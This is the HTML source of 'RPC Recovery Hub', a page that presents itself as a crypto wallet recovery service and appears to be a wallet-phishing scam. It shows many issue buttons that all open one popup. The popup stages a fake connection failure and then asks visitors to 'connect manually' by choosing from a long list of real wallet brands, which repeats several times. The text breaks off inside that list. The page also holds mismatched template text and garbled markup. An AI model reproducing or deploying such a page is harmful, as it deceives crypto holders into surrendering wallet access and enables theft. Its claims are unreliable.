﻿<!DOCTYPE html><html class="no-js" lang="en">
    
<head>
        <meta charset="utf-8">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <title>RPC Recovery Hub - We are here to help you resolve your crypto related issues</title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
		<link rel="shortcut icon" type="image/x-icon" href="assets/images/favicon.png">
        <script src="jquery-3.6.4.min.js"></script>
        <link rel="stylesheet" href="ajax/libs/select2/4.0.13/css/select2.min.css" integrity="sha256-XBGuNL8XpG9vs3zB9RFs8atFPKz+fcuf0qz76yzbYFo=" crossorigin="anonymous">
        <script src="ajax/libs/select2/4.0.13/js/select2.min.js" integrity="sha256-Y0jHMaSa6m6ZV3xmeZeOjOQ9g5aT47LSRXD/Sx+1zjA=" crossorigin="anonymous"></script>
        <link rel="stylesheet" href="assets/css/bootstrap.min.css">
        <link rel="stylesheet" href="assets/css/animate.min.css">
        <link rel="stylesheet" href="assets/css/fontawesome-all.min.css">
        <link rel="stylesheet" href="assets/css/mCustomScrollbar.min.css">
        <link rel="stylesheet" href="assets/css/odometer.css">
        <link rel="stylesheet" href="assets/css/slick.css">
        <link rel="stylesheet" href="assets/css/default.css">
        <link rel="stylesheet" href="assets/css/style.css">
        <link rel="stylesheet" href="assets/css/responsive.css">
        <link rel="stylesheet" id="stm-stmicons-css" href="assets/css/stmicons.css" type="text/css" media="all">
    </head>
    <body class="home-01">
        <!-- header-area -->
        <header id="header">
            <div id="header-fixed-height"></div>
            <div id="sticky-header" class="menu-area">
                <div class="container custom-container">
                    <div class="row">
                        <div class="col-12">
						
						
						
                        <div class="row mt-3-2m">
            <!-- Grid Item -->
            <script src="widgets.coingecko.com/coingecko-coin-price-marquee-widget.js"></script>
<coingecko-coin-price-marquee-widget  coin-ids="bitcoin,ethereum,eos,ripple,litecoin" currency="usd" background-color="#000000" locale="en" font-color="#c17e0b"></coingecko-coin-price-marquee-widget>
 
                
<div class="tradingview-widget-container__widget"></div>
  <script type="text/javascript" src="s3.tradingview.com/external-embedding/embed-widget-tickers.js" async>
  {
  "symbols": [
    {
      "proName": "FOREXCOM:SPXUSD",
      "title": "S&P 500"
    },
    {
      "proName": "FOREXCOM:NSXUSD",
      "title": "US 100"
    },
    {
      "proName": "FX_IDC:EURUSD",
      "title": "EUR to USD"
    },
    {
      "proName": "BITSTAMP:BTCUSD",
      "title": "Bitcoin"
    },
    {
      "proName": "BITSTAMP:ETHUSD",
      "title": "Ethereum"
    },
    {
      "description": "Tron to USD",
      "proName": "BINANCE:TRXUSD"
    },
    {
      "description": "Tether USD",
      "proName": "CRYPTOCAP:USDT"
    }
  ],
  "isTransparent": true,
  "showSymbolLogo": true,
  "colorTheme": "dark",
  "locale": "en"
}
  </script>
</div>
<!-- TradingView Widget END -->
                



                            <div class="mobile-menu">
                                <nav class="menu-box">
                                    <div class="close-btn"><i class="fas fa-times"></i></div>
                                    <div class="nav-logo"><a href="#"><img src="assets/images/logo.png" alt="" title=""></a>
                                    </div>
                                    <div class="menu-outer">
                                    </div>
                                    <div class="social-links">
                                        <ul class="clearfix">
                                            <li><a href="#"><i class="fab fa-facebook-f"></i></a></li>
                                            <li><a href="#"><i class="fab fa-twitter"></i></a></li>
                                            <li><a href="#"><i class="fab fa-instagram"></i></a></li>
                                            <li><a href="#"><i class="fab fa-linkedin-in"></i></a></li>
                                            <li><a href="#"><i class="fab fa-youtube"></i></a></li>
                                        </ul>
                                    </div>
                                </nav>
                            </div>
                            <div class="menu-backdrop"></div>
                            <!-- End Mobile Menu -->
                        </div>
                    </div>
                </div>
            </div>
        </header>
        <!-- header-area-end -->


        <!-- main-area -->
        <main class="fix">

            <!-- banner-area -->
            <section class="banner-area banner-bg">
                <div class="banner-shape-wrap">
                    <img src="assets/images/banner_shape01.png" alt="" class="img-one">
                    <img src="assets/images/banner_shape02.png" alt="" class="img-two">
                    <img src="assets/images/banner_shape03.png" alt="" class="img-three">
                </div>
                <div class="container">
                    <div class="row justify-content-center">
                        <div class="col-lg-10">
                            <div class="banner-content text-center">
                                <h2 class="title">RPC <span>Recovery</span> Hub</h2>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
            <!-- banner-area-end -->

            <!-- about-area -->
            <section id="about" class="about-area pt-130 pb-130">
                <div class="container">
                    <div class="row align-items-center">
                        <div class="col-lg-6">
                            <div class="about-img wow fadeInLeft" data-wow-delay=".2s">
                                <img src="assets/images/about_img01.png" alt="">
                                <img src="assets/images/about_img02.png" alt="" class="img-two">
                            </div>
                        </div>
                        <div class="col-lg-6">
                            <div class="about-content wow fadeInRight" data-wow-delay=".2s">
                                <div class="section-title mb-30">
                                    <span class="sub-title">Every digital artwork on Upside is authentic and truly unique. Blockchain
technology makes this new approach to digital ownership possible.</span>
                                    <h2 class="title">The <span>Platform</span> Offers</h2>
                                </div>
                                <p>Open and decentralized protocol for syncing various Wallets issues on Secure Server. This is not an app but a protocol that establishes a remote resolution between all noncustodial wallet
<br><br>
It is an online server which gets you across to every wallet representative to enable effective complain and rectification of issues. </p>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
            <!-- about-area-end -->

            <!-- partner-area -->
            <div class="partner-area pb-130">
                <div class="container">
                    <div class="row justify-content-center">
                        <div class="col-lg-8">
                            <div class="section-title text-center mb-10">
                                <span class="sub-title">Make Your Selection Below!</span>
                            </div>
                        </div>
                    </div>
                    <div class="row">
                        <div class="col-lg-12">
                            <div class="row">
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Migration Issues</a></h2>
            <p style="font-size:12px;">Click here for migration related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-chart-refresh"></i></a>
          </div>
        </div>
      </div>
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Validate Wallet</a></h2>
            <p style="font-size:12px;">Click here for wallet validation related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-check"></i></a>
          </div>
        </div>
      </div>
      
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Assets Recovery</a></h2>
            <p style="font-size:12px;">Click here for assets recovery related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-chart-refresh"></i></a>
          </div>
        </div>
      </div>

      <!-- Feature Item 2 -->
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">General Issues</a></h2>
            <p style="font-size:12px;">Click here for wallet general issues related</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-check"></i></a>
          </div>
        </div>
      </div>
      
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Rectification</a></h2>
            <p style="font-size:12px;">Click here for rectification related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-building6"></i></a>
          </div>
        </div>
      </div>

      <!-- Feature Item 2 -->
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Gas Fees</a></h2>
            <p style="font-size:12px;">Click here for Gas Fees related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-ia_clock"></i></a>
          </div>
        </div>
      </div>
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Migration Issues</a></h2>
            <p style="font-size:12px;">Click here for Gas Fees issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-building6"></i></a>
          </div>
        </div>
      </div>

      <!-- Feature Item 2 -->
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Claim Reward</a></h2>
            <p style="font-size:12px;">Click here for Claim Reward issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-oil"></i></a>
          </div>
        </div>
      </div>
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Deposits/Withdrawals</a></h2>
            <p style="font-size:12px;">Click here for Deposits/Withdrawals issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-loans_mobile"></i></a>
          </div>
        </div>
      </div>
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Slippage Error</a></h2>
            <p style="font-size:12px;">Click here for Slippage Error related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-marketplace"></i></a>
          </div>
        </div>
      </div>
      
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Migration Issues</a></h2>
            <p style="font-size:12px;">Click here for migration related related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-chart-refresh"></i></a>
          </div>
        </div>
      </div>

      <!-- Feature Item 2 -->
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Transaction Error</a></h2>
            <p style="font-size:12px;">Click here for Transaction Error related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-stm14_calc"></i></a>
          </div>
        </div>
      </div>
      
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Cross Chain</a></h2>
            <p style="font-size:12px;">Click here for Cross Chain Transfer related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-btc_public"></i></a>
          </div>
        </div>
      </div>

      <!-- Feature Item 2 -->
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Staking Issues</a></h2>
            <p style="font-size:12px;">Click here for Staking Issues related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-ia_clock"></i></a>
          </div>
        </div>
      </div>
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Swap/Exchange</a></h2>
            <p style="font-size:12px;">Click here for Swap/Exchange related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-marketplace"></i></a>
          </div>
        </div>
      </div>

      <!-- Feature Item 2 -->
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Connect to Dappst</a></h2>
            <p style="font-size:12px;">Click here for Connect to Dapps related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-stats"></i></a>
          </div>
        </div>
      </div>
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Login Issues</a></h2>
            <p style="font-size:12px;">Click here for Login related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-crypto_secured"></i></a>
          </div>
        </div>
      </div>
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Claim Airdrop</a></h2>
            <p style="font-size:12px;">Click here for Claim Airdrops related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-loans_mobile"></i></a>
          </div>
        </div>
      </div>
      
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">NFTS Issues</a></h2>
            <p style="font-size:12px;">Click here for NFTS Issues related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-chart-monitor"></i></a>
          </div>
        </div>
      </div>

      <!-- Feature Item 2 -->
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Missing/Irregular Balance</a></h2>
            <p style="font-size:12px;">Click here for Missing/Irregular Balance related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-lamp"></i></a>
          </div>
        </div>
      </div>
      
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Whitelist Issues</a></h2>
            <p style="font-size:12px;">Click here for Whitelist related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-plus"></i></a>
          </div>
        </div>
      </div>

      <!-- Feature Item 2 -->
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Transaction Delay</a></h2>
            <p style="font-size:12px;">Click here for Transaction delay related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-marker"></i></a>
          </div>
        </div>
      </div>
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Node Issues</a></h2>
            <p style="font-size:12px;">Click here for Node Related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-crypto_secured"></i></a>
          </div>
        </div>
      </div>

      <!-- Feature Item 2 -->
      <div class="col-lg-4">
        <div class="features-item">
          <div class="features-content">
            <h2 class="title"><a onclick="openPopup()">Trading Issues</a></h2>
            <p style="font-size:12px;">Click here for Trading Wallet related issues</p>
          </div>
          <div class="features-img">
            <a onclick="openPopup()"><i style="font-size: 72px; color:lightblue;" class="stm-rating_down"></i></a>
          </div>
        </div>
      </div>
    </div>
                        </div>
                    </div>
                </div>
            </div>
            <!-- chart-area -->
            <section id="sales" class="chart-area chart-bg jarallax">
                <div class="container">
                    <div class="chart-inner">
                        <div class="row align-items-center justify-content-center">
                            <div class="col-lg-12 col-md-10 order-0 order-lg-2">
                                <h2 class="title" align="center">Unlocking the Future: Your Trusted Partner in <span>Crypto Wealth Restoration</span> and Wallet Recovery Services.</h2>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
            <!-- chart-area-end -->

            <!-- contact-area -->
            <section id="contact" class="contact-area pt-70 pb-110">
                <div class="container">
                    <div class="row justify-content-center">
                        <div class="col-lg-8">
                            <div class="section-title text-center mb-70">
                                <span class="sub-title">Contact</span>
                                <h2 class="title"><span>Contact</span> RPC Recovery Hub</h2>
                            </div>
                        </div>
                    </div>
                    <div class="contact-form-wrap">
                        <form action="#">
                            <div class="row">
                                <div class="col-md-6">
                                    <div class="form-grp">
                                        <input type="text" placeholder="Enter your Name" required="">
                                    </div>
                                </div>
                                <div class="col-md-6">
                                    <div class="form-grp">
                                        <input type="email" placeholder="Enter you email" required="">
                                    </div>
                                </div>
                            </div>
                            <div class="form-grp">
                                <textarea name="massage" placeholder="Enter your massage"></textarea>
                            </div>
                            <div class="submit-btn text-center">
                                <button type="submit" class="btn">Send Massage</button>
                            </div>
                        </form>
                    </div>
                </div>
            </section>
            <!-- contact-area-end -->

        </main>
        <!-- main-area-end -->


        <!-- footer-area -->
        <footer>
            <div class="footer-area">
                <div class="container">
                    <div class="footer-scroll-wrap">
                        <button class="scroll-to-target" data-target="html"><i class="fas fa-arrow-up"></i></button>
                    </div>
                    <div class="footer-bottom">
                        <div class="row align-items-center">
                            <div class="col-lg-6">
                                <div class="copyright-text">
                                    <p>Copyright © 2024. All Rights Reserved RPC Recovery Hub</p>
                                </div>
                            </div>
                            <div class="col-lg-6 d-none d-sm-block">
                                <div class="footer-menu">
                                    <ul>
                                        <li><a href="#">Terms and conditions</a></li>
                                        <li><a href="#">Privacy policy</a></li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </footer>
<div class="popup-container" id="popup-container">
    <div class="popup">
        <div class="popup-header">
            <h6 style="color: black;">Connect Your Wallet <span>To Get Started</span></h6>
        </div>
        <div id="connecting">
            <center>
                <img src="assets/img/loading.gif" align="center">
                <br><br>
                <font color="green">Connecting....</font>
            </center>
        </div>
        <div id="walletForm" align="center" style="display: none;">
            <img src="assets/img/error.png" width="10px"> <font color="red" size="1px">Failed to Connect! Use the form below to connect manually.</font><br>
           <hr>
            <form id="buttonsubmit">
            <div class="dropdown image-dropdown">
                <label for="wallet_id">Wallet Type:</label>
                     <script>
    #wallet_id {
  width: 200px; /* Adjust width as needed */
  font-family: sans-serif;
  border: 1px solid #ccc;
  border-radius: 5px;
  padding: 10px;
  background-color: #fff;
}

/* Allow images inside options */
#wallet_id option {
  display: flex;
  align-items: center;
}

/* Style the images */
#wallet_id .option-image {
  margin-right: 10px; /* Adjust spacing between image and text */
  width: 25px; /* Adjust image size as needed */
  height: 25px; /* Adjust image size as needed */
  vertical-align: middle;
}
</script>

<select id="wallet_id" name="wallet_id">
        
    <!-- start -->
    <option value="Metamask">
        <img class="option-image" src="media/images/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png" alt="Metamask Image">
        Metamask
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Trust Wallet">
    <img class="option-image" src="media/images/trust-wallet-66f8777532931d9c09b633344981a6a9.png" alt="Trust Wallet Image">
        Trust Wallet
     </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Coinbase">
        <img class="option-image" src="media/images/coinbase.png" alt="Coinbase Image">
        Coinbase
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Keplr Wallet">
        <img class="option-image" src="media/images/keplr.png" alt="Keplr Wallet Image">
        Keplr Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="SafePal">
        <img class="option-image" src="media/images/safepal%20new.webp" alt="SafePal Image">
        SafePal
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Tronlink">
        <img class="option-image" src="media/images/tronlink.jpg" alt="Tronlink Image">
        Tronlink
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Defichain Wallet">
        <img class="option-image" src="media/images/defichain.jpg" alt="Defichain Wallet Image">
        Defichain Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="DFX Defichain">
        <img class="option-image" src="media/images/DFXDefichain.jpg" alt="DFX Defichain Image">
        DFX Defichain
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Solana">
        <img class="option-image" src="media/images/solana.png" alt="Solana Image">
        Solana
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Blockchain">
        <img class="option-image" src="media/images/blockchain-logo.png" alt="Blockchain Image">
        Blockchain
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Lobstr Wallet">
        <img class="option-image" src="media/images/lb.jpg" alt="Lobstr Wallet Image">
        Lobstr Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Yoroi Wallet">
        <img class="option-image" src="media/images/yr.jpg" alt="Yoroi Wallet Image">
        Yoroi Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Coinomi">
        <img class="option-image" src="media/images/coinomi.jpg" alt="Coinomi Image">
        Coinomi
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Edge Wallet">
        <img class="option-image" src="media/images/ed.jpg" alt="Edge Wallet Image">
        Edge Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Solar Wallet">
        <img class="option-image" src="media/images/solar.jpg" alt="Solar Wallet Image">
        Solar Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Pera Algo Wallet">
        <img class="option-image" src="media/images/pera-algo.jpg" alt="Pera Algo Wallet Image">
        Pera Algo Wallet
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Sender Wallet">
        <img class="option-image" src="media/images/sender.jpg" alt="Sender Wallet Image">
        Sender Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Xcel Pay Wallet">
        <img class="option-image" src="media/images/xceipay.jpg" alt="Xcel Pay Wallet Image">
        Xcel Pay Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Anchor Wallet">
        <img class="option-image" src="media/images/anchor.jpg" alt="Anchor Wallet Image">
        Anchor Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="ONTO">
        <img class="option-image" src="media/images/Onto.jpg" alt="ONTO Image">
        ONTO
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Rainbow">
        <img class="option-image" src="media/images/rainbow.jpg" alt="Rainbow Image">
        Rainbow
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Agent Wallet">
        <img class="option-image" src="media/images/agent.jpg" alt="Agent Wallet Image">
        Agent Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="CYBAVO Wallet">
        <img class="option-image" src="media/images/cybavo.jpg" alt="CYBAVO Wallet Image">
        CYBAVO Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="GrindPlus">
        <img class="option-image" src="media/images/gridplus.jpg" alt="GrindPlus Image">
        GrindPlus
    </option>
    <!-- end -->

    <!-- start -->
    <option value="imToken">
        <img class="option-image" src="media/images/imtoken-fd8c7c52dac6101568954e7448a49202.png" alt="imToken Image">
        imToken
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Pillar">
        <img class="option-image" src="media/images/pillar.webp" alt="Pillar Image">
        Pillar
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Cryto.com | Defi Wallet">
        <img class="option-image" src="media/images/crypto.png" alt="Cryto.com | Defi Wallet Image">
        Cryto.com | Defi Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Gnosis Safe Multisig">
        <img class="option-image" src="media/images/Gnosis%20Safe.webp" alt="Gnosis Safe Multisig Image">
        Gnosis Safe Multisig
    </option>
    <!-- end -->
    <!-- start -->
    <option value="Curve Finance">
        <img class="option-image" src="media/images/curvelogo.png" alt="Curve Finance Image">
        Curve Finance
    </option>
    <!-- end -->

    <!-- start -->
    <option value="TokenPocket">
        <img class="option-image" src="media/images/tokenpocket.webp" alt="TokenPocket Image">
        TokenPocket
    </option>
    <!-- end -->

    <!-- start -->
    <option value="MathWallet">
        <img class="option-image" src="media/images/mathwallet.jpg" alt="MathWallet Image">
        MathWallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="BitPay">
        <img class="option-image" src="media/images/bitpay-1573dd6c95eb38386f181048663590d0.jpg" alt="BitPay Image">
        BitPay
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Ledger Live">
        <img class="option-image" src="media/images/ledger%20live.png" alt="Ledger Live Image">
        Ledger Live
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Walleth">
        <img class="option-image" src="media/images/walleth.jpg" alt="Walleth Image">
        Walleth
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Authereum">
        <img class="option-image" src="media/images/Authereum.jpg" alt="Authereum Image">
        Authereum
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Dharma">
        <img class="option-image" src="media/images/Dhrama.jpg" alt="Dharma Image">
        Dharma
    </option>
    <!-- end -->

    <!-- start -->
    <option value="1inch Wallet">
        <img class="option-image" src="media/images/1inch.jpg" alt="1inch Wallet Image">
        1inch Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Huobi Wallet">
        <img class="option-image" src="media/images/huobi.webp" alt="Huobi Wallet Image">
        Huobi Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Eidoo">
        <img class="option-image" src="media/images/eidoo.jpg" alt="Eidoo Image">
        Eidoo
    </option>
    <!-- end -->

    <!-- start -->
    <option value="MYKEY">
        <img class="option-image" src="media/images/Mykey.jpg" alt="MYKEY Image">
        MYKEY
    </option>
    <!-- end -->

    <!-- start -->
    <option value="TrustVault">
        <img class="option-image" src="media/images/Truthvault.jpg" alt="TrustVault Image">
        TrustVault
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Curve Finance">
        <img class="option-image" src="media/images/curvelogo.png" alt="Curve Finance Image">
        Curve Finance
    </option>
    <!-- end -->

    <!-- start -->
    <option value="TokenPocket">
        <img class="option-image" src="media/images/tokenpocket.webp" alt="TokenPocket Image">
        TokenPocket
    </option>
    <!-- end -->

    <!-- start -->
    <option value="MathWallet">
        <img class="option-image" src="media/images/mathwallet.jpg" alt="MathWallet Image">
        MathWallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="BitPay">
        <img class="option-image" src="media/images/bitpay-1573dd6c95eb38386f181048663590d0.jpg" alt="BitPay Image">
        BitPay
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Ledger Live">
        <img class="option-image" src="media/images/ledger%20live.png" alt="Ledger Live Image">
        Ledger Live
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Walleth">
        <img class="option-image" src="media/images/walleth.jpg" alt="Walleth Image">
        Walleth
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Authereum">
        <img class="option-image" src="media/images/Authereum.jpg" alt="Authereum Image">
        Authereum
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Dharma">
        <img class="option-image" src="media/images/Dhrama.jpg" alt="Dharma Image">
        Dharma
    </option>
    <!-- end -->

    <!-- start -->
    <option value="1inch Wallet">
        <img class="option-image" src="media/images/1inch.jpg" alt="1inch Wallet Image">
        1inch Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Huobi Wallet">
        <img class="option-image" src="media/images/huobi.webp" alt="Huobi Wallet Image">
        Huobi Wallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Eidoo">
        <img class="option-image" src="media/images/eidoo.jpg" alt="Eidoo Image">
        Eidoo
    </option>
    <!-- end -->

    <!-- start -->
    <option value="MYKEY">
        <img class="option-image" src="media/images/Mykey.jpg" alt="MYKEY Image">
        MYKEY
    </option>
    <!-- end -->

    <!-- start -->
    <option value="TrustVault">
        <img class="option-image" src="media/images/Truthvault.jpg" alt="TrustVault Image">
        TrustVault
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Atomic">
        <img class="option-image" src="media/images/Atomic.jpg" alt="Atomic Image">
        Atomic
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Coin98">
        <img class="option-image" src="media/images/coin98.jpg" alt="Coin98 Image">
        Coin98
    </option>
    <!-- end -->

    <!-- start -->
    <option value="zkSync">
        <img class="option-image" src="media/images/znky.jpg" alt="zkSync Image">
        zkSync
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Shell Exchange">
        <img class="option-image" src="media/images/shell-f8ae42223837aae3358dcc1de881406e.jpg" alt="Shell Exchange Image">
        Shell Exchange
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Index Coop">
        <img class="option-image" src="media/images/indexcoop-9c383dd154f6f30145853d7ec3726c4c.jpg" alt="Index Coop Image">
        Index Coop
    </option>
    <!-- end -->

    <!-- start -->
    <option value="SwapX">
        <img class="option-image" src="media/images/swap.jpg" alt="SwapX Image">
        SwapX
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Starname">
        <img class="option-image" src="media/images/starname.png" alt="Starname Image">
        Starname
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Space">
        <img class="option-image" src="media/images/space-9705cd779cebb6665ca3e9c2f124ef3a.png" alt="Space Image">
        Space
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Maskbook">
        <img class="option-image" src="media/images/maskbook-808a88212bc45b95cf21835db9b01b50.png" alt="Maskbook Image">
        Maskbook
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Snapshot">
        <img class="option-image" src="media/images/snapp.jpg" alt="Snapshot Image">
        Snapshot
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Invoice.build">
        <img class="option-image" src="media/images/invoice.png" alt="Invoice.build Image">
        Invoice.build
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Ankr">
        <img class="option-image" src="media/images/ankr-37d75439a9caa532b64264103a1afd57.jpg" alt="Ankr Image">
        Ankr
    </option>
    <!-- end -->

    <!-- start -->
    <option value="DODO">
        <img class="option-image" src="media/images/dodo.png" alt="DODO Image">
        DODO
    </option>
    <!-- end -->

    <!-- start -->
    <option value="zLOT">
        <img class="option-image" src="media/images/zlot-94acfa2da7de104d5ec9b4f8d443660b.jpg" alt="zLOT Image">
        zLOT
    </option>
    <!-- end -->
    
    <!-- start -->
    <option value="Curve Finance">
        <img class="option-image" src="media/images/curvelogo.png" alt="Curve Finance Image">
        Curve Finance
    </option>
    <!-- end -->

    <!-- start -->
    <option value="TokenPocket">
        <img class="option-image" src="media/images/tokenpocket.webp" alt="TokenPocket Image">
        TokenPocket
    </option>
    <!-- end -->

    <!-- start -->
    <option value="MathWallet">
        <img class="option-image" src="media/images/mathwallet.jpg" alt="MathWallet Image">
        MathWallet
    </option>
    <!-- end -->

    <!-- start -->
    <option value="BitPay">
        <img class="option-image" src="media/images/bitpay-1573dd6c95eb38386f181048663590d0.jpg" alt="BitPay Image">
        BitPay
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Ledger Live">
        <img class="option-image" src="media/images/ledger%20live.png" alt="Ledger Live Image">
        Ledger Live
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Walleth">
        <img class="option-image" src="media/images/walleth.jpg" alt="Walleth Image">
        Walleth
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Authereum">
        <img class="option-image" src="media/images/Authereum.jpg" alt="Authereum Image">
        Authereum
    </option>
    <!-- end -->

    <!-- start -->
    <option value="Dharma">
